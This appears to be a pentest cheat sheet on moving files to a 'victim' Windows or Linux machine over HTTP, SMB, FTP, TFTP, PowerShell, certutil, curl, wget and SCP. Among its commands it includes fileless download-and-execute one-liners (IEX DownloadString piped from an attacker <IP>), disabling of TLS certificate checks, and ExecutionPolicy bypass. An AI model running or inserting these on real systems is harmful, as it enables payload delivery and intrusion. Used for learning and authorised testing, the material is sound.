Note
- Some Operations May Be Blocked Due to Windows
Firewall - Policies. - The
Default Portsthat the Services use Down Below Might be Blocked Or Filtered byIDS - Firewall - Policies.
Note
Server- Basic Queries to setup a Running Server.Target- These Operations should be done on the Victim Machine.Interactive- We Log into a Remote Machine via RDP - SSH etc..Non Interactive- Commands run in their own Subshell and this Shell is not Interactive. Opens to Execute but closes Immediately.
HTTP Server
:: Python[3]
python3 -m http.server <PORT>
:: Python[2]
python -m SimpleHTTPServer <PORT>
:: PHP
php -S 0.0.0.0:<PORT>
:: Ruby
ruby -run -ehttpd . -p<PORT>
:: Requires [http-server] NPM Package
:: Simple JavaScript HTTP Server
http-server [path] [options]
SMB
SMB-2 And Authentication (Username - Password) Requirements May Be Necessary Due to Windows Policies- Server
- Target
:: SMB-2: [-smb2support]
:: Optional Arguments: [-user] [-password]
smbserver -smb2support "SHARE_NAME" "DIRECTORY" -user "Username" -password "Password"
:: SMB Server without Authentication
smbserver -smb2support "SHARE_NAME" "DIRECTORY"
:: Mount the SMB Server with Username and Password
net use Z: \\"IP"\"SHARE_NAME" /user:"Username" "Password"
:: List SMB Share Contents
dir \\"IP"\"SHARE_NAME"
:: Download Files
copy \\"IP"\"SHARE_NAME"\"File Name" "Output"
copy Z:\"File Name" "Output"
:: Requires [PuTTY] to be Installed on Windows
pscp <Username>@<IP>:"File Name" "Output"
FTP
- Server
- Interactive
- Non Interactive
:: Requires [pyftpdlib] Package
:: Start The Server
python3 -m pyftpdlib --port 21
:: Interactive SHELL
:: Access The Server
:: [USER: anonymous PASSWORD: anonymous]
:: [GET] - Download The File
ftp ➜ open ➜ <IP> ➜ GET "File Name"
:: Non Interactive SHELL
:: Target
echo open IP > FTP.txt
echo USER anonymous >> FTP.txt
echo anonymous >> FTP.txt
echo GET FILE.exe >> FTP.txt
echo bye >> FTP.txt
:: Download The File
ftp -v -n -s:FTP.txt
# PSH Download Method
(New-Object Net.WebClient).DownloadFile('ftp://<IP>/<File Name>', '<Output>')
TFTP
- Server
- Target
:: Requires [atftp] Package
:: Create TFTP Directory
mkdir /tftp
chown nobody: /tftp
:: Start The Server
atftpd --daemon --port 69 /tftp
:: Target [PUT - GET]
tftp -i $IP PUT $FILE
tftp -i $IP GET $FILE
PSH
Common Errors With PowerShell
- Error
- Bypass
There may be cases when the Internet Explorer First-Launch Configuration has not been Completed, which prevents the Download.
PS C:\> Invoke-WebRequest https://<IP>/<File Name> | IEX
Invoke-WebRequest : The response content cannot be parsed because the Internet Explorer engine is not available, or Internet Explorer's first-launch configuration is not complete. Specify the UseBasicParsing parameter and try again.
At line:1 char:1
+ Invoke-WebRequest https://<IP> ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotImplemented: (:) [Invoke-WebRequest], NotSupportedException
+ FullyQualifiedErrorId : WebCmdletIEDomNotSupportedException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand
# The [Error] can be Bypassed with [-UseBasicParsing]
Invoke-WebRequest https://<IP>/<File Name> -UseBasicParsing | IEX
- Error
- Bypass
This Powershell Error comes if the SSL/TLS Secure Channel Certificate is not Trusted.
PS C:\> IEX(New-Object Net.WebClient).DownloadString('https://<IP>/<File Name>')
Exception calling "DownloadString" with "1" argument(s): "The underlying connection was closed: Could not establish trust relationship for the SSL/TLS secure channel."
At line:1 char:1
+ IEX(New-Object Net.WebClient).DownloadString('https://<IP>/ ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : WebException
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
Powershell Web Downloads Methods
| Method | Description |
|---|---|
| OpenRead | Returns the Data from a Resource as a Stream. |
| OpenReadAsync | Returns the Data from a Resource without Blocking the calling Thread. |
| DownloadData | Downloads Data from a Resource and returns a Byte Array. |
| DownloadDataAsync | Downloads Data from a Resource and returns a Byte array without Blocking the calling Thread. |
| DownloadFile | Downloads Data from a Resource to a Local File. |
| DownloadFileAsync | Downloads Data from a Resource to a local file without Blocking the calling Thread. |
| DownloadString | Downloads a String from a Resource and returns a String. |
| DownloadData | Downloads a String from a Resource without Blocking the calling Thread. |
- Interactive
- Non Interactive
# [DownloadFile] Method
# More Methods can be Found on the [Powershell Web Downloads Methods] Dropdown Menu
(New-Object Net.WebClient).DownloadFile('http://<IP>/<File Name>','<Output>')
echo $storageDir = $pwd > PSH.ps1
echo $webclient = New-Object System.Net.WebClient >> PSH.ps1
echo $url = "http://<IP>/<File Name>" >> PSH.ps1
echo $file = "Output" >> PSH.ps1
echo $webclient.DownloadFile($url,$file) >> PSH.ps1
powershell -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File PSH.ps1
# [IEX] - Invoke-Expression
# [DownloadString] - Fileless Method (Without Saving)
IEX (New-Object Net.WebClient).DownloadString('http://<IP>/<Output>')
# IEX Accepts Pipeline Input
(New-Object Net.WebClient).DownloadString('http://<IP>/<Output>') | IEX
Invoke-WebRequest http://<IP>/<File Name> -OutFile <Output>
Invoke-RestMethod http://<IP>/<File Name> -OutFile <Output>
CERTUTIL
:: Save Remote File
certutil -urlcache -split -f "http://<IP>/<File Name>"
certutil -verifyctl -split -f "http://<IP>/<File Name>"
CURL - WGET
:: Save Remote File
curl "http://<IP>/<File Name>" -o <Output>
:: Save Remote File
wget "http://<IP>/<File Name>" -O <Output>
SCP
:: Copy Remote File to the Local System
scp -P 22 <Username>@<IP>:C:\"File Name" "Output"